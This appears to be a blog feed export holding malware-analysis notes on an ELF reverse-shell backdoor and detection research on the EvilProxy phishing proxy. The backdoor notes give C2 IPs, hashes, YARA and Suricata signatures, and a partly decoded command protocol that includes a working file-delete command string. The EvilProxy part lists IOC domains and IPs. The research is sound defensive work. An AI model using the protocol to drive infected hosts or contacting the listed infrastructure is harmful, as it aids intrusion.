width="320" /></a></div><p></p><div><br /></div><div><b>End</b></div><div><br /></div><div>Have fun researching threats & malware!</div><br /><p></p><p><b>Links</b></p><p><a href="https://www.whonix.org/">https://www.whonix.org/</a></p><p><a href="https://www.whonix.org/wiki/VirtualBox#CLI">https://www.whonix.org/wiki/VirtualBox#CLI</a></p><p><a href="https://www.whonix.org/wiki/Documentation">https://www.whonix.org/wiki/Documentation</a></p><p><a href="https://www.whonix.org/wiki/Other_Operating_Systems">https://www.whonix.org/wiki/Other_Operating_Systems</a></p><p><a href="https://malware.news/t/setting-up-whonix-gateway-in-vmware-workstation/61279">https://malware.news/t/setting-up-whonix-gateway-in-vmware-workstation/61279</a> </p></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-81910607813003214162022-11-29T14:39:00.000-08:002022-11-29T14:39:07.321-08:00OpenSSL-1.0.0-fipps Linux Backdoor - Notes<h2 style="text-align: left;">Introduction:</h2><div>In some security/malware chat room, someone posted about an ELF backdoor, at the time, I couldn't find much information about it and any related samples or reports. Few weeks ago, I saw similar sample being discussed on twitter, which was found by a researcher in an open directory.</div><div><br /></div><div>In this post, I just have some notes on my analysis/research of this sample and related samples. This might help with writing a signature or doing further research. I'm just calling this OpenSSL-1.0.0-fipps backdoor since that's what it initially sends to the C2 server and "fipps" has an extra p. </div><div><br /></div><div>As far as I'm aware, I haven't found similar samples with the searches I've done and I have not seen any samples successfully connect to C2 on any public sandboxes. I was also not able to find any executables for the C2 with some of the yara rules I wrote and queried Hybrid-Analysis for.</div><h2 style="text-align: left;">Notes:</h2><div>It's a reverse shell/backdoor. The binary researches out to the C2 IP and Port defined in the binary. You can find C2 IP by just running strings.</div><div><br /></div><div><b>Samples:</b></div><div><b>MD5 hashes:</b></div><div><div>eb7ba9f7424dffdb7d695b00007a3c6d VT: First Submission 2022-04-21 18:44:09 UTC, submission name: suspicious</div><div>97f352e2808c78eef9b31c758ca13032 VT: First Submission 2022-08-26 22:47:54 UTC, submission name: client</div><div>3e9ee5982e3054dc76d3ba5cc88ae3de VT: First Submission 2022-11-04 00:18:27 UTC, submission name: client</div></div><div><br /></div><div><b>Sha256 hashes:</b></div><div><div>8cd16feb7318c0de3027894323a0ccaacb527e071aa4c4b691feb411b6bd0937</div><div>40da2329b2b81f237fc30d2274529e6fda4364516b78b4b88659c572fbc4bc02</div><div>4e5e42b1acb0c683963caf321167f6985e553af2c70f5b87ec07cc4a8c09b4d8</div></div><div><br /></div><div><b>C2s:</b></div><div>162.220.10.214</div><div>107.175.64.203</div><div>185.29.10.38</div><div><br /></div><div>After doing some historic searches, the C2's were running Windows, not that it matters much.</div><div><br /></div><div><b>TELFhash</b> for the binaries is: t1afe0d814d67c0dad4ab20c30d4989a94a047eb2688752922ab98d9c1883d917f15cf5f</div><div><br /></div><div><b>File command results & diff:</b></div><div><div>ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=<b>16eee120b0a557907a782d1405c8f86415902fa5</b>, stripped</div><div>ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=<b>16eee120b0a557907a782d1405c8f86415902fa5</b>, stripped</div><div>ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=2c46d3c40075dc7a193f8041f9458b40fd1f31cf, stripped</div></div><div><br /></div><div>BuildID are the same for eb7ba9f7424dffdb7d695b00007a3c6d and 97f352e2808c78eef9b31c758ca13032 and only diff is the IP.</div><div><br /></div><div><div>< 00004110: 0000 0000 0000 0000 3130 372e 3137 352e ........107.175.</div><div>< 00004120: 3634 2e32 3033 0067 6574 6966 6164 6472 64.203.getifaddr</div><div>---</div><div>> 00004110: 0000 0000 0000 0000 3136 322e 3232 302e ........162.220.</div><div>> 00004120: 3130 2e32 3134 0067 6574 6966 6164 6472 10.214.getifaddr</div></div><div><br /></div><div>Not 100% sure about the reason for this and why someone modified just the IP and why it wasn't recompiled.</div><div><br /></div><div><br /></div><div>eb7ba9f7424dffdb7d695b00007a3c6d was the sample being discussed in a chat room, the user mentioned that the file was dropped after log4j exploitation. </div><div><br /></div><div>The most recent sample 3e9ee5982e3054dc76d3ba5cc88ae3de was found in an open directory. Here's the tweet regarding it: <a href="https://twitter.com/r3dbU7z/status/1588337205595951106">https://twitter.com/r3dbU7z/status/1588337205595951106</a> In the reply tweet below (<a href="https://twitter.com/1ZRR4H/status/1588398704913895425">https://twitter.com/1ZRR4H/status/1588398704913895425</a> ) the user mentions finding a webshell as well. Maybe the threat actor is initially gaining access through external web vulns. I'm not really sure.</div><div><br /></div><div>Finally, there is 97f352e2808c78eef9b31c758ca13032 and I'm not sure where it came from. The sample was discovered after searching for the following <b>yara rule </b>on Hybrid Analysis:</div><div><br /></div><div><div>rule elf_backdoor_fipps</div><div>{</div><div> strings:</div><div> $a = "found mac address"</div><div> $b = "RecvThread"</div><div> $c = "OpenSSL-1.0.0-fipps"</div><div> $d = "Disconnected!"</div><div> condition:</div><div> (all of them) and uint32(0) == 0x464c457f</div><div>}</div></div><div><br /></div><div>(there is also "dbus-statd" that appears in the all the binaries)</div><div><br /></div><div>There is also a <b>Suricata signature </b>published by Proofpoint/EmergingThreats that exists:</div><div><br /></div><div>alert tcp any any -> any 443 (msg:"ET MALWARE Malicious ELF Activity"; dsize:<50; content:"OpenSSL-1.0.0-fipps"; startswith; fast_pattern; reference:md5,eb7ba9f7424dffdb7d695b00007a3c6d; classtype:trojan-activity; sid:2036592; rev:1; metadata:affected_product Mac_OSX, affected_product Linux, attack_target Client_Endpoint, created_at 2022_05_12, deployment Perimeter, former_category MALWARE, signature_severity Major, tag RAT, updated_at 2022_05_12;)</div><div><br /></div><div>The suricata signature above is for initial connection from the backdoor to the c2 server.</div><div>When the sample runs, it prints "!!!Hello World!!!" and the mac address it found, connects to the C2 server, sends OpenSSL-1.0.0-fipps and the mac address.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjITZ3Ccb3v7WCvwS95MM80Pm7xmUJ7cWP57l_Bbt5F9GGUoTCaBjzobhjo4qnwY9NE1bc3y3GqI8w0zc0U3U7fahm3xrw_yxx8avvuGwKQns857SSHGCO-xNsMIfMV-XptoApbicBwPJatV0yR8CQY62cQqNwYycyFTh_gh_QnTc0YFEoqiY2IeU-y" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="486" data-original-width="1252" height="155" src="https://blogger.googleusercontent.com/img/a/AVvXsEjITZ3Ccb3v7WCvwS95MM80Pm7xmUJ7cWP57l_Bbt5F9GGUoTCaBjzobhjo4qnwY9NE1bc3y3GqI8w0zc0U3U7fahm3xrw_yxx8avvuGwKQns857SSHGCO-xNsMIfMV-XptoApbicBwPJatV0yR8CQY62cQqNwYycyFTh_gh_QnTc0YFEoqiY2IeU-y=w400-h155" width="400" /></a></div><br />There also appears to be I guess a heartbeat packet which looks like this:</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi1pbvb7BuXvr4pAGW1OtnFQH6I9MqC08HQVYzl-KAcq0DHb6rj2NOcHZmwo-3wDgdPEhhk_ltWk-isAOkP9e3Nh75Xak8qB4pYk3V5_8zckrtM4ui76Y2xZlZA_ashFrGNV7MW8eBfd4vdiiV-YYlPFgLVe3R95YItkAZN2MoZeUU49Svzs4JWX_C3" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="264" data-original-width="1270" height="84" src="https://blogger.googleusercontent.com/img/a/AVvXsEi1pbvb7BuXvr4pAGW1OtnFQH6I9MqC08HQVYzl-KAcq0DHb6rj2NOcHZmwo-3wDgdPEhhk_ltWk-isAOkP9e3Nh75Xak8qB4pYk3V5_8zckrtM4ui76Y2xZlZA_ashFrGNV7MW8eBfd4vdiiV-YYlPFgLVe3R95YItkAZN2MoZeUU49Svzs4JWX_C3=w400-h84" width="400" /></a></div><br />Processing of commands takes place at FUN_00401f23 (i'm just using names ghidra assigns):</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjn3Myun_VWGIUhV0yazpkuTpqRXvlPfFa0ZT9Xv13a8ULn9aaEuW1uRV2OgIZYEkifY6bCCJOIcBXid1Qm6WLCnItzd9-3NccWJiZpmni-Iz39a2GvDn6wlSLao_a1PqWPMZJ55strH2Ha0kQFo-ARdYLBvdao-D4GAGjq_s6_R5NV1XLTzLw8S70m" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1102" data-original-width="1252" height="563" src="https://blogger.googleusercontent.com/img/a/AVvXsEjn3Myun_VWGIUhV0yazpkuTpqRXvlPfFa0ZT9Xv13a8ULn9aaEuW1uRV2OgIZYEkifY6bCCJOIcBXid1Qm6WLCnItzd9-3NccWJiZpmni-Iz39a2GvDn6wlSLao_a1PqWPMZJ55strH2Ha0kQFo-ARdYLBvdao-D4GAGjq_s6_R5NV1XLTzLw8S70m=w640-h563" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEibv0TsJahKmPVSNoxZG_gQ-WsH_PzJMZaBp2i9WIf3r-qQ7JC3-nP27tP8N5BD0jNO5SpqedhUOLTRtsdmdOs26tCkBiXIOq77QYKcxTGEG2TZ76MyJ0V3vAX9JhM8J47masfhhKEGs1e1eCyqOiugih7_KWA7qyAQ8KLZFafk1zspThkE7VUt3Kx3" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="768" data-original-width="1208" height="406" src="https://blogger.googleusercontent.com/img/a/AVvXsEibv0TsJahKmPVSNoxZG_gQ-WsH_PzJMZaBp2i9WIf3r-qQ7JC3-nP27tP8N5BD0jNO5SpqedhUOLTRtsdmdOs26tCkBiXIOq77QYKcxTGEG2TZ76MyJ0V3vAX9JhM8J47masfhhKEGs1e1eCyqOiugih7_KWA7qyAQ8KLZFafk1zspThkE7VUt3Kx3=w640-h406" width="640" /></a></div><br />The binary is stripped and I wasn't able to figure out every single function or execute every single function but it has typical backdoor capabilities and it's also able to gather some info and send it back to the C2. There also seems to be encoding of the output (by FUN_00402181 ??) before it gets sent via network. </div><div><br /></div><div>1: grab user and system info</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgs0KEmAFpbPTAJlxvD7Vi4PsSe05CUyclI-Z_M8lCv8k7NxTVCRgTO4UkmHkLqQn9mqILlUnnntc0Q53oSTMOemjvcy7xF2i9BhdITB8gvx9Yn99C81WeG7TSewcq6Cz75ufF4H3mkSJ8OlVF0asY0VlolPLYZhbPA2luMTF9_cLPEypvaN7lpSonj" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="130" data-original-width="698" height="60" src="https://blogger.googleusercontent.com/img/a/AVvXsEgs0KEmAFpbPTAJlxvD7Vi4PsSe05CUyclI-Z_M8lCv8k7NxTVCRgTO4UkmHkLqQn9mqILlUnnntc0Q53oSTMOemjvcy7xF2i9BhdITB8gvx9Yn99C81WeG7TSewcq6Cz75ufF4H3mkSJ8OlVF0asY0VlolPLYZhbPA2luMTF9_cLPEypvaN7lpSonj" width="320" /></a></div><br />3: shell?</div><div>5: write file?</div><div>7: not sure</div><div>0xb: delete a file</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjL9I0wDhLrDZBq9GMJdZg06t_rSUVizqyI1Tt1ziTRtpjk73Oy7CY5GPOD86wntDQtcAQ_84q2BYq34Ki4W5KGRFR1lZyuwYeMQ4XrOI-dkk_JEHbwJWvxRyMjlAWtej5EuBa0DzCkCuALc9nNuGuuTvsg8FuQAAHAurXW3Sxx_RQ8mYTGDAy8XTfx" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="264" data-original-width="744" height="114" src="https://blogger.googleusercontent.com/img/a/AVvXsEjL9I0wDhLrDZBq9GMJdZg06t_rSUVizqyI1Tt1ziTRtpjk73Oy7CY5GPOD86wntDQtcAQ_84q2BYq34Ki4W5KGRFR1lZyuwYeMQ4XrOI-dkk_JEHbwJWvxRyMjlAWtej5EuBa0DzCkCuALc9nNuGuuTvsg8FuQAAHAurXW3Sxx_RQ8mYTGDAy8XTfx" width="320" /></a></div>0xd: directory/file listing?</div><div>0xf: not sure</div><div>0x11: not sure</div><div>0x13: not sure</div><div>0x17: seems to return c2 connection info</div><div><br /></div><div>It does have functions for doing network connections, killing processes, etc...</div><div><br /></div><div>From doing some testing, the command input that it expects seems to be 16 bytes. The following worked for me for deleting a file:</div><div>\x00\x00\x00\x00\x00\x00\x00\x00\<b>x0b\x00 (command) \x05\x00 (input size)</b>\x00\x00\x00\x00delme</div><div>0b is the command (byte next to 0b is supposed to the secondary command if that function supports it) and 05 is the number of bytes to read afterwards, delme is 5 bytes.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEglxH9adete7SjxNCo5iA5a5qtBHjLpdED5qTsQC9-R_Rq_vD7ZuwGAr3POLOZHJJSnEvXZ9iU9MqOUnGRONuj-nMkCumPpiE9QZREr30amLlE-Wo6-V-tWpxZuZz_3sEXIYK66EsN9WemLhK9IIxQoBE8_glEP_UKG6oC1geQcMDlOsvi3Cg6EbaKW" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1142" data-original-width="3164" height="230" src="https://blogger.googleusercontent.com/img/a/AVvXsEglxH9adete7SjxNCo5iA5a5qtBHjLpdED5qTsQC9-R_Rq_vD7ZuwGAr3POLOZHJJSnEvXZ9iU9MqOUnGRONuj-nMkCumPpiE9QZREr30amLlE-Wo6-V-tWpxZuZz_3sEXIYK66EsN9WemLhK9IIxQoBE8_glEP_UKG6oC1geQcMDlOsvi3Cg6EbaKW=w640-h230" width="640" /></a></div><br /></div><div>I'm not sure about the impact of changing other values in that 16 byte input but I know it changes the way the backdoor processes the input & encodes (first 8 bytes).</div><div><br /></div><div><br /></div><h3 style="text-align: left;">Conclusion:</h3><div>It's a weird backdoor that I haven't found much info about or have seen fully run in a sandbox while being connected to its C2. </div><div><br /></div><div>I assume it's being used after initial access through web/external vulnerability (according to the tweets related to the latest sample, the threat actor had some usernames and active directory info they had taken from an organization they breached) but I'm not sure as there aren't many samples (or reports) I was able to find with the TELFhash and yara rule I made. It's very easy for the threat actor to modify the strings in the binary. I did see some specific assembly instructions that I wrote a yara rules for but they came back with the files that I already had.</div><div><br /></div><h2 style="text-align: left;">Links:</h2><div><a href="https://www.virustotal.com/gui/file/8cd16feb7318c0de3027894323a0ccaacb527e071aa4c4b691feb411b6bd0937/details">https://www.virustotal.com/gui/file/8cd16feb7318c0de3027894323a0ccaacb527e071aa4c4b691feb411b6bd0937/details</a></div><div><br /></div><div><a href="https://www.virustotal.com/gui/file/40da2329b2b81f237fc30d2274529e6fda4364516b78b4b88659c572fbc4bc02/details">https://www.virustotal.com/gui/file/40da2329b2b81f237fc30d2274529e6fda4364516b78b4b88659c572fbc4bc02/details</a></div><div><br /></div><div><a href="https://www.virustotal.com/gui/file/4e5e42b1acb0c683963caf321167f6985e553af2c70f5b87ec07cc4a8c09b4d8/details">https://www.virustotal.com/gui/file/4e5e42b1acb0c683963caf321167f6985e553af2c70f5b87ec07cc4a8c09b4d8/details</a></div><div><br /></div><div><a href="https://twitter.com/r3dbU7z/status/1588337205595951106">https://twitter.com/r3dbU7z/status/1588337205595951106</a> </div><div><br /></div><div><a href="https://twitter.com/1ZRR4H/status/1588398704913895425">https://twitter.com/1ZRR4H/status/1588398704913895425</a> </div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-76356664522371948732022-11-21T13:35:00.002-08:002022-11-21T13:35:49.326-08:00Looking for EvilProxy - Notes<h2 style="text-align: left;"><b>Introduction:</b></h2><p>This started with someone asking about EvilProxy and any signatures for detecting it. </p><p>EvilProxy is a phishing as a service (PhaaS), which can be used to capture credentials and cookies from a user auth, which also also works with MFA being enabled. It's essentially a reverse proxy that captures information for the attacker when you auth/start a session on a service that's doing reverse proxy for.</p><p>More information can be found here: <a href="https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web">https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web</a></p><p>Similar projects include evilnginx, modlishka, and muraena.</p><p><br /></p><p>Usually for http/https traffic signature, we may want to look for <b>status code, post/get parameters & pattern, URI pattern, JA3/JA3S, cert properties, html properties/body, and etc</b>. </p><p>Here's an example for evilnginx:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiktQeb8Oa2eKfBhZNYBtkbJm4aSpXM852cHSjC3SX5xikaLorQXOlUXzaIY_kXy4zVYOFf4pGDNultKNWY4qwKKRB0P6mIQK6JVPXiK_16b9Tl7Hpzsyj6PjwUzoJ2MiiiW6OMIP5uG9OMRn3eId5g4sQdvGD75Si6qvs9NdeXvfWFXkYN2eNi01l7" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="478" data-original-width="1522" height="169" src="https://blogger.googleusercontent.com/img/a/AVvXsEiktQeb8Oa2eKfBhZNYBtkbJm4aSpXM852cHSjC3SX5xikaLorQXOlUXzaIY_kXy4zVYOFf4pGDNultKNWY4qwKKRB0P6mIQK6JVPXiK_16b9Tl7Hpzsyj6PjwUzoJ2MiiiW6OMIP5uG9OMRn3eId5g4sQdvGD75Si6qvs9NdeXvfWFXkYN2eNi01l7=w543-h169" width="543" /></a></div><br /><a href="https://github.com/kgretzky/evilginx2/blob/master/core/certdb.go#L400">https://github.com/kgretzky/evilginx2/blob/master/core/certdb.go#L400</a><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh1S6oiFleXnUehBzIVJY7RpPvJv5AlFt_fdheCCneCzafR1K7w78d17DCHZpzcROJU1CInLIlQWhqElJMjuMZsGbWUMZF37-r6t258-1eWDj3Oai_ilw6FL-ItYOrnl5xHH6iUU_5UnLWZ6FPckVQUU4t0eBN2Pqo9Zo0OqXj9n9OySWTiNCo0N3TB" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="532" data-original-width="828" height="206" src="https://blogger.googleusercontent.com/img/a/AVvXsEh1S6oiFleXnUehBzIVJY7RpPvJv5AlFt_fdheCCneCzafR1K7w78d17DCHZpzcROJU1CInLIlQWhqElJMjuMZsGbWUMZF37-r6t258-1eWDj3Oai_ilw6FL-ItYOrnl5xHH6iUU_5UnLWZ6FPckVQUU4t0eBN2Pqo9Zo0OqXj9n9OySWTiNCo0N3TB" width="320" /></a></div><p><a href="https://twitter.com/malwrhunterteam/status/1354039003121647624">https://twitter.com/malwrhunterteam/status/1354039003121647624</a></p><br /><p></p><p>There can be multiple types of detections as well. For example, <b>detection of a service by utilizing scanning/scan response</b> (shodan/censys) and <b>detection from traffic monitoring</b> (zeek extracting cert info and logging).</p><p><br /></p><p>In this post, I'm just documenting just methods and what I've found researching EvilProxy. I don't have anything conclusive and from screenshots/videos the EvilProxy looks pretty thought-out and I'm sure it's easy for the devs to change behavior. They let you customize pretty much everything.</p><h2 style="text-align: left;"><b>Notes:</b></h2><p>Looking at the video shared by Resecurity, I see the following:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjG9axdxNf3vL2os6pPuq4wlW-uWd00APIuNXgmUbJzc7oTMlP3SQkp8X_-7oP8KRnTOYzWEHdLzg0dY46zemudSPTAggRdxjA1PsoJGxMgBFD4jZbKmvne94CXGQXpGxKHHCwT1rMShtucVUsYv5wMbnoRKuyuAdilfyrZQhKwN42-bSZeUTi4C6q8" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="288" data-original-width="712" height="129" src="https://blogger.googleusercontent.com/img/a/AVvXsEjG9axdxNf3vL2os6pPuq4wlW-uWd00APIuNXgmUbJzc7oTMlP3SQkp8X_-7oP8KRnTOYzWEHdLzg0dY46zemudSPTAggRdxjA1PsoJGxMgBFD4jZbKmvne94CXGQXpGxKHHCwT1rMShtucVUsYv5wMbnoRKuyuAdilfyrZQhKwN42-bSZeUTi4C6q8" width="320" /></a></div><br />subdomain is set to lmo by default. <p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhK_YmiJkujTCyt7ZOVAjl56ZwyQmjym4tXmRXiiAZn01NEOENwV8adtRhujH16amR-2L0Ah_5jTTY5MMCWl49o-NLIvCliKMgjQXEdQSCfUn33IrGbVsq33UOZonfvQKN969L41Go6j2Pvy8iQj31GLwRlvLAegp0ExzXEPeink1Par0Bkepsor55A" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="572" data-original-width="746" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEhK_YmiJkujTCyt7ZOVAjl56ZwyQmjym4tXmRXiiAZn01NEOENwV8adtRhujH16amR-2L0Ah_5jTTY5MMCWl49o-NLIvCliKMgjQXEdQSCfUn33IrGbVsq33UOZonfvQKN969L41Go6j2Pvy8iQj31GLwRlvLAegp0ExzXEPeink1Par0Bkepsor55A" width="313" /></a></div><br />Stream BotGuard redirects to brave.com by default. Later on there is also redirect to example.com and office.com<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEht1DUd2sTeBo3O9GEXai50oXBtLbcQl65Xaa7_AmhF9WzPbbL7fCeE-0KeC2xbpd3vut6Qrl2jtMRgoo5d1TkCIPAmgJBVEM5sAGHVAy5GO4oytpZsEUPEL7uf5kEucoAZB7zwj9JE62h6faEZuuGXj25f6qawHNYmdVYJWQnjgGw2Zxx_8FnsCsJr" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1256" data-original-width="2876" height="140" src="https://blogger.googleusercontent.com/img/a/AVvXsEht1DUd2sTeBo3O9GEXai50oXBtLbcQl65Xaa7_AmhF9WzPbbL7fCeE-0KeC2xbpd3vut6Qrl2jtMRgoo5d1TkCIPAmgJBVEM5sAGHVAy5GO4oytpZsEUPEL7uf5kEucoAZB7zwj9JE62h6faEZuuGXj25f6qawHNYmdVYJWQnjgGw2Zxx_8FnsCsJr" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi6bOGZ6hmXEqEW_I7u0zP4ixZMbuFTd35TUCcStVwHfNk1LHb-8_6btTIRuSOlES2XFDArciOvW7XU8ZFQm0ABqhi0eYTXoaMZmhEBfQdlz31esuxZVO1vhE5rIWKdpzuQnxWnHkhQXfF29rGun8X69IaSHPoiQEsJq2JP6y-mo6kDkH7h8V1JD0ms" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="392" data-original-width="1792" height="96" src="https://blogger.googleusercontent.com/img/a/AVvXsEi6bOGZ6hmXEqEW_I7u0zP4ixZMbuFTd35TUCcStVwHfNk1LHb-8_6btTIRuSOlES2XFDArciOvW7XU8ZFQm0ABqhi0eYTXoaMZmhEBfQdlz31esuxZVO1vhE5rIWKdpzuQnxWnHkhQXfF29rGun8X69IaSHPoiQEsJq2JP6y-mo6kDkH7h8V1JD0ms=w438-h96" width="438" /></a></div><br /></div>URL GET query can have username=email@example.com but that seems optional.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjjqAUQMhRnPGZf1UoqeAaI9-9w_CZqsUw-POtvX_FSU-pkHy1L038ZG590U81qiUCj36cSpAtvuVfKLzc78Gy6hoWy1LQttj0bgQfiiMxd1YLLH_hwepymqbMWo88ynAC2XVD-FLpqjfvq58Srn_jmuPCCgX749Y3kzIuTFVLe07uPevjpvlbmdOSZ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="616" data-original-width="2088" height="94" src="https://blogger.googleusercontent.com/img/a/AVvXsEjjqAUQMhRnPGZf1UoqeAaI9-9w_CZqsUw-POtvX_FSU-pkHy1L038ZG590U81qiUCj36cSpAtvuVfKLzc78Gy6hoWy1LQttj0bgQfiiMxd1YLLH_hwepymqbMWo88ynAC2XVD-FLpqjfvq58Srn_jmuPCCgX749Y3kzIuTFVLe07uPevjpvlbmdOSZ" width="320" /></a></div><p>URL with eqp=base64_email_address is also supported.</p><p></p><p><br /></p><p>Some of the interesting IOC's listed by Resecurity are:</p><p></p><ul style="text-align: left;"><li>147[.]78[.]47[.]250</li><li>185[.]158[.]251[.]169</li><li>194[.]76[.]226[.]166</li><li>msdnmail[.]net</li><li>evilproxy[.]pro</li><li>top-cyber[.]club</li><li>rproxy[.]io</li><li>login-live.rproxy[.]io</li></ul><p></p><p>The other IOC comes from ThreatInsight/Proofpoint posting a domain and attributing it to EvilProxy phishing kit</p><p></p><ul style="text-align: left;"><li>hxxps://auth[.]royalqueenelizabeth[.]com/?</li></ul><div><br /></div><h3 style="text-align: left;"><b>Status Code:</b></h3><p></p><p>Searching for some of the IP's on Shodan and viewing history shows this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiP0UISQHP2T4pKbB9snqCeg5Cmnkitecrqvv7YacfXNSJYCx-3t03nIuFDsxvYDB53mmHCPTlpF0VDk-vDGLBvWab4jqtiyVYxg2DA7RratFft8RLgx3LZm5d-WTHxNj-6F8ofxt_7ceGrAveUa4si6MkncFccr9sgq3hZD_thj8_lKr5zMaCDbb-6" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="872" data-original-width="890" height="275" src="https://blogger.googleusercontent.com/img/a/AVvXsEiP0UISQHP2T4pKbB9snqCeg5Cmnkitecrqvv7YacfXNSJYCx-3t03nIuFDsxvYDB53mmHCPTlpF0VDk-vDGLBvWab4jqtiyVYxg2DA7RratFft8RLgx3LZm5d-WTHxNj-6F8ofxt_7ceGrAveUa4si6MkncFccr9sgq3hZD_thj8_lKr5zMaCDbb-6=w281-h275" width="281" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiIuwcJBTP0Cc2L3MXX5sQFRF1lMynJHIWvQvlZ_RdgDlaVVyJGMOHBJl_AMjbxnNZ35738KGbG6jGAJJUOrD6r21qHMuMK6GEz28amvrUwLDF0vHv4JJ5zhds4BlZYdjSlU0jmPXx-1Nij_1yGpRiuY4XVoXHjsyQUNsa1-j9PV1VcXzQ2yAnuMUIx" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="854" data-original-width="932" height="259" src="https://blogger.googleusercontent.com/img/a/AVvXsEiIuwcJBTP0Cc2L3MXX5sQFRF1lMynJHIWvQvlZ_RdgDlaVVyJGMOHBJl_AMjbxnNZ35738KGbG6jGAJJUOrD6r21qHMuMK6GEz28amvrUwLDF0vHv4JJ5zhds4BlZYdjSlU0jmPXx-1Nij_1yGpRiuY4XVoXHjsyQUNsa1-j9PV1VcXzQ2yAnuMUIx=w283-h259" width="283" /></a></div><br />Looking at webpage scan runs on Anyrun shows this:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi6MZMIiS_Yu1gVQmYSEJBgGMs7Pp3mIUy1ntrlQ7PfPvUPzm9TBFljIO9ovhq2jDqi7ixYVBDZ-D0poQb4SL4Rs3694ZvvvhNDTsKL_u9v8-yX0y1Dezofb3wMUJtA7TGRnZAvMPoENUHXN-R-YHIHsHHfEJL-EAPK6Gv3jim_O3iHMzFVpfuwWDFf" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="926" data-original-width="1062" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEi6MZMIiS_Yu1gVQmYSEJBgGMs7Pp3mIUy1ntrlQ7PfPvUPzm9TBFljIO9ovhq2jDqi7ixYVBDZ-D0poQb4SL4Rs3694ZvvvhNDTsKL_u9v8-yX0y1Dezofb3wMUJtA7TGRnZAvMPoENUHXN-R-YHIHsHHfEJL-EAPK6Gv3jim_O3iHMzFVpfuwWDFf" width="275" /></a></div><br />This is what URLScan shows as well:<div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgtNnRg_5jtMgPIlPd6TS-rVrzvfGEqbc5svsPWHW_N6AD1VXzLEdUdm2YI4eq1_UW3FEDVB9QezV0LndmXSQgBpg1llJXSXxXmCunjQJ-bReXndk21iHw2cgEZQBcVs5o_f2nd9sjhDHNebAIH0W8R_VDVJVEY5VCVWo-LPNoSbWgr0LAlEUDBBgP0" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1064" data-original-width="1934" height="301" src="https://blogger.googleusercontent.com/img/a/AVvXsEgtNnRg_5jtMgPIlPd6TS-rVrzvfGEqbc5svsPWHW_N6AD1VXzLEdUdm2YI4eq1_UW3FEDVB9QezV0LndmXSQgBpg1llJXSXxXmCunjQJ-bReXndk21iHw2cgEZQBcVs5o_f2nd9sjhDHNebAIH0W8R_VDVJVEY5VCVWo-LPNoSbWgr0LAlEUDBBgP0=w549-h301" width="549" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a 